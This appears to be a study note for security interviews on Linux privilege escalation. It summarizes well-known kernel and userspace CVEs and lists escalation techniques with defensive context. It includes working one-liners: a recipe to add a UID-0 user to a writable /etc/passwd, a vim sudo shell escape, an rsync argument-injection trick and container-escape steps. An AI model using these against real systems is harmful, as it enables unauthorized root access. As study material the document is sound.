Security Notes
Linux

Linux Exploits — Mythos Findings & Core Knowledge

Tracks CVEs, techniques, and privilege escalation paths. The "Mythos" section records exploits attributed to or curated by the mythos researcher/handle. The general sections cover must-know Linux kernel exploits for security interviews.

8 min read 5 sections

Mythos-Attributed Findings

Add CVE numbers, PoC links, and affected kernel versions here as they're discovered/published.

CVEAffected VersionsTypeNotes
TBD——Populate as mythos publishes findings

Memory hook

most Linux privesc CVEs are one of three bug-shapes, all aiming at "user → root." When you read these CVEs, sort them by primitive: race conditions / TOCTOU (DirtyCOW, Dirty Pipe — win a timing window to write something you shouldn't), memory corruption (use-after-free and overflows in the kernel or a setuid program — PwnKit/pkexec, Baron Samedit/sudo), and logic/validation flaws (the eBPF verifier mis-proving a program safe, a namespace or capability check missed). They share a goal — turn local code execution into root — and a defense story: the kernel-hardening sysctls and nosuid/lockdown from linux-hardening plus patching fast, since these get weaponized within hours. Detection-wise, kernel exploits are hard to catch on the way in, so you lean on the aftermath — an unexpected uid-0 process, a setuid binary appearing, auditd execve anomalies. Mnemonic: race, corruption, or logic — three roads to root.

Must-Know Linux Kernel CVEs

DirtyCOW — CVE-2016-5195

Type

Race condition in copy-on-write (COW) mechanism in mmap

Impact

Any unprivileged local user can write to read-only memory mappings → overwrite SUID binaries or /etc/passwd

Affected

Linux kernel < 4.8.3

PoC path

Write to /proc/self/mem racing against madvise(MADV_DONTNEED)

Fix

vm_write_begin/vm_write_end serialisation added in 4.8.3

Interview angle

Classic race condition; explain COW semantics and why MADV_DONTNEED breaks the invariant

🧠 Fun fact

One of the first "celebrity" bugs — it got a name, a logo, and merch. Linus Torvalds wrote the fix himself and admitted he'd actually tried to fix the same bug back in 2005, but the fix was reverted because it broke s390 hardware nobody could test on. So the hole sat open for ~11 years. The name is a pun on Copy-On-Write.

DirtyPipe — CVE-2022-0847

Type

Uninitialized pipe_buffer.flags allows overwriting read-only page cache

Impact

Unprivileged user overwrites arbitrary read-only files (e.g., SUID binaries, /etc/passwd)

Affected

Linux kernel 5.8 – 5.16.10 / 5.15.24 / 5.10.101

Mechanism

splice() + write() to a pipe; flag PIPE_BUF_FLAG_CAN_MERGE not cleared on new pipe buffer

Fix

Clear flags on pipe_buf_operations allocation

Interview angle

Contrast with DirtyCOW — no race condition needed; simpler and more reliable

🧠 Fun fact

Max Kellermann found it by accident — he was debugging corrupted files in a customer's web-server download logs (recurring CRC checksum errors) and the trail led to a kernel memory bug, not a disk fault. The name is a deliberate homage to DirtyCOW. Because there's no race to win, the exploit is 100% reliable on the first try — which is rare and scary for a kernel privesc.

Overlayfs Privilege Escalation — CVE-2023-0386

Type

File capability copy without uid mapping check in OverlayFS

Impact

Unprivileged user copies a file with CAP_SETUID capability into an overlay mount → executes as root

Affected

Linux kernel < 6.2

Mechanism

copy_up in OverlayFS doesn't strip extended attributes (xattrs) holding capabilities when the source is in a different uid namespace

Fix

Capability stripping on copy_up across uid namespace boundaries

eBPF Privilege Escalation — CVE-2021-3490 / CVE-2021-31440

Type

Out-of-bounds read/write in eBPF ALU32 bitwise operations verifier

Impact

Local user with CAP_BPF or unprivileged eBPF enabled → kernel code execution

Affected

5.7 – 5.11

Interview angle

eBPF verifier bugs are a consistent attack surface; know what the verifier is supposed to do (prevent arbitrary memory access from BPF programs)

PwnKit — CVE-2021-4034

Type

Local privilege escalation in pkexec (Polkit)

Impact

Any local unprivileged user → root (user-space bug, not kernel)

Affected

Every pkexec version since 2009

Mechanism

argc == 0 path in pkexec doesn't validate argv[0]; crafted environment leads to writing out-of-bounds into envp then loading attacker-controlled shared library

Fix

Polkit 0.120

🧠 Fun fact

The bug had been sitting in pkexec since its very first release in 2009 — about 12 years — on essentially every major Linux distro. It's a userspace bug (Polkit), so updating the kernel does nothing; you patch the package. Discovered by Qualys, who also named Baron Samedit (CVE-2021-3156, a ~10-year-old sudo heap overflow). Lesson: setuid userland helpers are as juicy a target as the kernel — and "ancient + everywhere" is the recurring theme.

Looney Tunables — CVE-2023-4911

Type

Buffer overflow in glibc's ld.so dynamic linker when processing GLIBC_TUNABLES

Impact

Local user with control over environment variables → local root

Affected

glibc 2.34+

Mechanism

tunables_strdup() overflows a stack buffer during env var parsing in SUID execution context

🧠 Fun fact

Qualys named it after the GLIBC_TUNABLES environment variable (and Looney Tunes). It hit default installs of Fedora, Ubuntu, and Debian — no exotic config needed. It's a reminder that the dynamic linker (ld.so) runs with the privileges of whatever SUID binary you launch, so a bug in how it parses environment variables is a root bug, because the attacker fully controls the environment.

Netfilter / nftables — CVE-2023-32233 / CVE-2022-32250

Type

Use-after-free in nftables (netfilter)

Impact

Local user with CAP_NET_ADMIN → kernel code execution → root

Affected

Various kernel versions 5.x

Interview angle

nftables has been a recurring source of UAFs; namespace-based CAP_NET_ADMIN makes this reachable from container breakouts too


Linux Privilege Escalation Techniques

SUID/SGID Binaries

bash
find / -perm -4000 -type f 2>/dev/null   # find SUID binaries
find / -perm -2000 -type f 2>/dev/null   # find SGID binaries
  • GTFOBins: list of Unix binaries that can be abused when they have SUID set
  • Common targets: find, vim, bash, cp, nmap, python
  • In plain English: the SUID bit makes a program run as its owner (usually root) no matter who launches it. Harmless for passwd; catastrophic for anything that can run your commands. find can run a command (-exec), vim/python can spawn a shell, cp can overwrite /etc/passwd — so if any of them is SUID-root, it's a one-liner to root.
  • 🧠 Fun fact: GTFOBins is a searchable catalogue of exactly these one-liners. Workflow on a box: find / -perm -4000 2>/dev/null, then look up each result on GTFOBins. The defender does the same search — your SUID list should be short and boring; a SUID python3 or find is a giant red flag someone put there.

Sudo Misconfigurations

bash
sudo -l                                   # list allowed sudo commands
  • (ALL) NOPASSWD: /usr/bin/vim → :!/bin/bash inside vim → root shell
  • Wildcard abuse: sudo rsync * attacker:/tmp/ → inject --rsh=sh exploit.sh

Cron Jobs

bash
cat /etc/crontab
ls -la /etc/cron*
  • World-writable script executed by root cron → replace content
  • PATH hijacking: cron runs backup.sh without absolute path; attacker controls earlier PATH directory

Writable /etc/passwd

bash
openssl passwd -1 -salt evil evilpassword     # make an MD5 ($1$) hash for a password you know
echo 'evil:$1$evil$...:0:0:root:/root:/bin/bash' >> /etc/passwd   # the two 0s = UID 0, GID 0 = ROOT
su evil                                         # log in with evilpassword → root shell
  • If /etc/passwd is world-writable, add a root-equivalent user. Root is defined by UID 0, not by the name root — so any account whose third field is 0 is root. Modern systems keep real hashes in /etc/shadow, but /etc/passwd still accepts an inline hash in field 2 (a legacy fallback), which is why this one-liner works. (Full passwd-vs-shadow breakdown and offline-cracking workflow: privilege-escalation.md.)

Kernel Exploit Path (Generic)

  1. uname -a → identify kernel version
  2. Search CVEs: searchsploit linux kernel <version>
  3. Compile PoC on target (or cross-compile)
  4. Upload via writable dir (/tmp, /dev/shm)
  5. Execute → root shell

NFS No_root_squash

bash
cat /etc/exports                           # look for no_root_squash
showmount -e <target>
  • Mount NFS share as root on attacker machine → create SUID binary → execute on target

Docker/Container Escape Paths

  • --privileged container → mount /dev/sda1 /mnt → chroot into host
  • docker.sock mounted inside container → create new privileged container
  • CAP_SYS_ADMIN → cgroups release_agent PoC (classic container escape)
📖

Why these work — a container is not a VM. A container is just processes on the host kernel, fenced off by namespaces (separate views of PIDs, mounts, network) and cgroups (resource limits). There's no hardware boundary like a VM has, so anything that lets you punch through the fence drops you onto the host. The three above are the classic holes: --privileged removes almost all the fencing (you can see and mount the host's disks → read/write the real filesystem); a mounted docker.sock is the Docker daemon's API — and the daemon runs as root on the host, so "talk to the socket" = "ask root to run anything for you"; and CAP_SYS_ADMIN ("the new root") lets you abuse the cgroup release_agent to make the host kernel execute your script. Takeaway: --privileged, a mounted docker socket, and CAP_SYS_ADMIN are the three things to grep for first.


Kernel Architecture Reminders

ConceptNotes
Ring 0 / Ring 3Kernel space (0) vs user space (3); syscalls cross the boundary
syscall tablePointer array; rootkits often hook here
mmap / COWMap-on-write defers physical copy until write; DirtyCOW breaks this
eBPF verifierValidates BPF programs before JIT; verifier bugs = kernel privesc
Namespacespid, net, mnt, user, uts, ipc; user namespaces enable unprivileged eBPF/nftables
CapabilitiesFine-grained root privileges; CAP_NET_ADMIN, CAP_SYS_ADMIN, CAP_BPF
SMEP/SMAPPrevent kernel from executing/reading user-space pages
KASLRKernel Address Space Layout Randomisation; info leak needed first
Stack canaryGuard value before return address; stack smashing mitigation

Useful Tools

ToolPurpose
linpeas.shAutomated Linux privilege escalation enumeration
linux-exploit-suggesterMatch kernel version to known CVEs
pspyMonitor processes without root (detects cron jobs)
GTFOBinsSUID/sudo/cron binary abuse reference
searchsploitLocal ExploitDB search